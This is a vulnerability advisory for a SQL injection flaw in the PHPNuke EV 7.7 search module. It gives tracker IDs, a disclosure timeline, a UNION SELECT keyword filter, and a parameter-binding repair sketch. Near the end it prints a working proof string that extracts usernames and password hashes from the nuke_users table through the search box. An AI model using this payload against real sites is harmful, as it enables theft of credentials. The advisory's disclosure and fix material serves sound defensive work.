###############################################
PHPNuke EV 7.7 'search' module 'query' variable SQL injection
Vendor url: http://nukevolution.com/
exploit available: yes vendor notify: yes
advisory: http://lostmon.blogspot.com/2006/01/phpnuke-ev-77-search-module-query.html
OSVDB ID: 22316 Related OSVDB: 21002 and 20866
BID: 16186
Secunia: SA18394 Related Secunia: SA17638 and SA17543
################################################
PHPNuke EV 7.7 has a flaw which can be exploited by malicious
people to conduct SQL injection attacks.
Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
#################
versions:
################
PHPNuke EV 7.7 -R1
Prior versions are possibly affected.
##################
solution:
###################
No solution at this time!!!
A possible fix:
Open file modules/Search/index.php and after this code:
------------------------------------
require_once("mainfile.php");
$instory = '';
$module_name = basename(dirname(__FILE__));
get_lang($module_name);
----------------------------------------------
you can add this:
------------------------------------
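// Stop the request if the search term contains UNION SELECT,
// written with a space or with %20 (case-insensitive match).
// preg_match() with /i replaces eregi(), which was removed in PHP 7.
if (preg_match('/UNION( |%20)SELECT/i', $query)) {
    die();
}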
----------------------------------------------
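This is a "simple fix": it only detects the UNION SELECT command
and dies if it is in the query variable. You can write the same check
for UNION ALL SELECT or other variants of the exploit.
The filter does not repair the query itself; the variable still has to
be escaped or bound as a parameter where the SQL statement is built.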
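A sketch of the underlying repair, binding the search term as a parameter instead of filtering keywords. This is an added example, not code from PHPNuke EV or from the advisory author: the stories table, its columns, the function names and the in-memory SQLite database (PDO with the pdo_sqlite driver) are assumptions made so it runs stand-alone. It shows the proof string from this advisory being matched as literal text.

```php
<?php
// Added example, not PHPNuke EV code. Table, column and function names
// are assumptions; the rows are constructed sample data.

// Make LIKE wildcards typed by the user match literally ('!' is the escape).
function escape_like(string $term): string
{
    return strtr($term, ['!' => '!!', '%' => '!%', '_' => '!_']);
}

// The search term is bound as a parameter, so quotes, parentheses and
// SQL keywords inside it stay data and never become part of the statement.
function search_stories(PDO $db, string $term): array
{
    $stmt = $db->prepare(
        "SELECT sid, title FROM stories WHERE title LIKE :pat ESCAPE '!'"
    );
    $stmt->execute([':pat' => '%' . escape_like($term) . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE stories (sid INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO stories (title) VALUES ('Security update'), ('100% uptime')");

// Two ordinary terms, then the proof string from this advisory.
$terms = [
    'security',
    '100%',
    "s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*",
];
foreach ($terms as $term) {
    $rows = search_stories($db, $term);
    printf("%-20.20s => %d row(s)\n", $term, count($rows));
}
```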
####################
Timeline
####################
discovered:21-11-2005
vendor notify:29-12-2005 (forums)
vendor response:-------
vendor fix:-----
disclosure:09-01-2006
###################
example:
###################
Go to
http://[Victim]/modules.php?name=Search
and enter this proof string in the search box:
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
All users' hashes are then available to view.
#################### €nd ########################
Thanks to estrella for being my light
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....